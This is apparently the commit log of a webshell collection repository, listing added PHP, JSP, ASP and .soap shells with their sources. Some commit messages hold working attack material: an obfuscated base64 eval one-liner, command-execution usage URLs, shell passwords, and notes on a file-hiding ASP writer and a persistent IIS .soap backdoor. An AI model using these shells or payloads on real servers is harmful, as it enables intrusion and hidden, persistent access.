Commit graph

372 commits

Author SHA1 Message Date
tennc
374204e0a1 Create zone_hackbar_other.php 2016-05-14 10:00:16 +08:00
tennc
2ca0e86887 Update zone_hackbar_beutify.php 2016-05-14 09:59:33 +08:00
tennc
bcd3802f2a Create zone_hackbar.php 2016-05-14 09:59:03 +08:00
tennc
0f1969eb8f Create zone_hackbar_beutify.php 2016-05-14 09:57:25 +08:00
tennc
6747dd53a1 Merge pull request #13 from radarhere/patch-1
Fixed typo
2016-05-10 09:16:34 +08:00
Andrew Murray
c2c5a56413 Fixed typo 2016-05-07 21:27:09 +10:00
tennc
83906eff2e Update 非常规的pHp一句话木马.php
ps:经过网友@kevins1022 测试,不可用。特说明下。
或许是我们的测试姿势不正确。先保留
2016-05-05 16:25:39 +08:00
tennc
dac3f49545 Merge pull request #11 from 54Pany/master
add 啊D小工具 - 目录读写检测 [ASPX版].aspx
2016-04-20 11:52:06 +08:00
54Pany
2faec6d586 add 啊D小工具 - 目录读写检测 [ASPX版].aspx 2016-04-19 19:57:57 +08:00
tennc
c0b9db0a2c add wso-4.2.4.php @twepl 👍
form : https://github.com/HARDLINUX/webshell
2016-04-18 10:22:00 +08:00
tennc
f3201ef686 Merge pull request #10 from Medicean/master
删除原蚁剑 jsp shell, 添加中国蚁剑 shell 目录及多个 shell
2016-04-15 22:03:42 -05:00
Medicean
5d27dc3dd3 修正 readme 2016-04-16 02:23:35 +08:00
Medicean
8bcd40d1af 删除原蚁剑 jsp shell, 添加中国蚁剑 shell 目录及多个 shell 2016-04-16 02:19:29 +08:00
tennc
5cb5936681 Create jsp_File_browser.jsp
from : https://github.com/farnulfo/jspfilebrowser
2016-04-05 14:52:55 +08:00
tennc
ea7284f287 Create test.jsp
usage: http://www.xxx.xxx/test.jsp?cmd=command
http://www.xxx.xxx/test.jsp?cmd=whoami
2016-04-05 14:30:53 +08:00
tennc
072e033e32 Create pb.jsp
exp:  http://www.xxx.xxx/pb.jsp?cmd=command
http://www.xxx.xxx/pb.jsp?cmd=whoami
2016-04-05 14:27:42 +08:00
tennc
db87aa1609 add shell_ant.jsp @antoor 👍
password : ant
author: antoor
2016-04-05 14:23:57 +08:00
tennc
6c6fd08281 add caidao shell for jsp
passowrd: yunyan
2016-04-05 14:21:25 +08:00
tennc
aa46988557 Create Customize.soap
from : zone.wooyun.org
author : RedFree

1、.soap文件只有放在web根目录时才能顺利调用,放到子目录中会报错! 
这个错误我并未解决,且待更深入的学习吧。。。 
2、.soap调用一次后,即便把这个文件删除,方法依然存在且可调用,除非重启IIS!(很好的后门咩) 
3、针对不同的.NET版本,以上代码有可能报错,可自行修改。 
4、因无法搞定GET/POST传参的异常,如果要使用菜刀去连接,你需要写一个简单的中转脚本。
2016-04-05 12:42:19 +08:00
tennc
43a5e624c8 add cutstomize.asp
author: RedFree
form : zone.wooyun.org
password : z
choice : cutstomize
2016-03-16 13:14:22 +08:00
tennc
0847517820 add Ridter'Pentest backdoor tools @Ridter 👍 2016-03-02 11:48:51 +08:00
tennc
1ace28d60b create version 4.2.3 @twepl 👍
form : https://github.com/HARDLINUX/webshell
2016-01-25 14:57:57 +08:00
tennc
626bc6a486 create version 4.2.2 @twepl 👍
form : https://github.com/HARDLINUX/webshell
2016-01-11 13:37:25 +08:00
tennc
6d480c737d Create z-2016-01-05.php
password: z
from : zone.wooyun.org
2016-01-05 20:53:06 +08:00
tennc
77ccd336c5 create version 4.2.1 @twepl 👍 2015-12-27 11:35:18 +08:00
tennc
067ed71861 create readme.md @twepl 👍 2015-12-27 11:31:57 +08:00
tennc
70dcf0e796 Create wso-4.2.0.php 2015-12-26 11:03:49 +08:00
tennc
4b4b299426 update other shell repository @tanjiti 👍 2015-12-25 14:13:53 +08:00
tennc
242e1db98b Create sqzr.php
password: sqzr
caidao shell
$mpy = create_function('', base64_decode("IEBldmFsKCRfUE9TVFsnc3F6ciddKTs=")); $mpy();
2015-12-25 14:04:47 +08:00
tennc
3fc2d3a889 Create good_1.asp
当参数task=1时 
如果你传递参数 
http://222.39.14.164/xdexdb4w.asp;.txt?task=1&paths=jtgw&nnfilename=1.asp&content=lalla 
参数说明 
task:执行命令的id 
paths:在哪个文件夹写文件(如果是空,则在在最后一个文件夹下写入文件) 
nnfilename:文件名 
content:文件内容 
主要这个被写出来的文件被隐藏成为系统文件类型,而且是文件为只读 
当task=2时 
当传递的参数为 
http://localhost/1.asp?task=2&paths=&defaulthtml=mengmeng&nnfilename=1.txt&content=mamama 
这个功能只是比上一个多出来了一个创建文件夹的功能 
defaulthtml:创建的文件夹名字 
from: zone.wooyun.org
2015-12-17 09:55:51 +08:00
tennc
52cccb6308 Create x.jsp 2015-11-30 22:56:17 +08:00
tennc
f52e977b24 Create shell1.jsp 2015-11-30 22:54:45 +08:00
tennc
1415965584 Rename t00ls.jsp to t00ls1.jsp 2015-11-30 22:54:11 +08:00
tennc
08c970a69a Create ha.jsp 2015-11-30 22:51:44 +08:00
tennc
c94962d51a Create dy.jsp 2015-11-30 22:50:17 +08:00
tennc
eca96146e9 add wso-4.1.3.php @twepl 👍
from : https://github.com/HARDLINUX/webshell
2015-11-24 13:27:44 +08:00
tennc
7e295e77ec add reverse-shell-cheat-sheet
from : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
2015-11-06 13:50:00 +08:00
tennc
0d5688e8eb add w-ob_start02.php
author : isno
from : wooyun.org

success running PHP5.3.3 >=
2015-10-29 20:30:34 +08:00
tennc
e046b28382 add w-ob_start01.php
from : wooyun.org
author : isno
2015-10-29 20:28:44 +08:00
tennc
777cd7a179 Create readme.md
author : Jeary
2015-10-22 12:23:20 +08:00
tennc
5942cda7f1 add netspy.jsp
author : Jeary
from : zone.wooyun.org
2015-10-22 12:21:56 +08:00
tennc
89262988cd Update short_shell.md 2015-10-19 23:48:43 +08:00
tennc
e9646d4cc8 Create short_shell.md
from : zone.wooyun.com
author : RedFree
2015-10-19 23:45:30 +08:00
tennc
8f18e861e2 add reademe.md @weaknetlabs 👍
link : https://github.com/weaknetlabs/wpes
2015-10-11 10:21:13 +08:00
tennc
8a73f19be9 add wpes-v0.2.php @weaknetlabs :+1+ 2015-10-11 10:16:12 +08:00
tennc
d9c808ea3f Update php一句话 2015-09-27 16:16:04 +08:00
tennc
e8d1be08ed Rename php一句话.md to php一句话 2015-09-21 17:02:09 +08:00
tennc
2acbcdf6d5 Update php一句话.md 2015-09-21 17:01:45 +08:00
tennc
14825d7f6f Rename php一句话 to php一句话.md 2015-09-21 16:59:51 +08:00
tennc
ab3dabfbf5 Update php一句话 2015-09-21 16:59:34 +08:00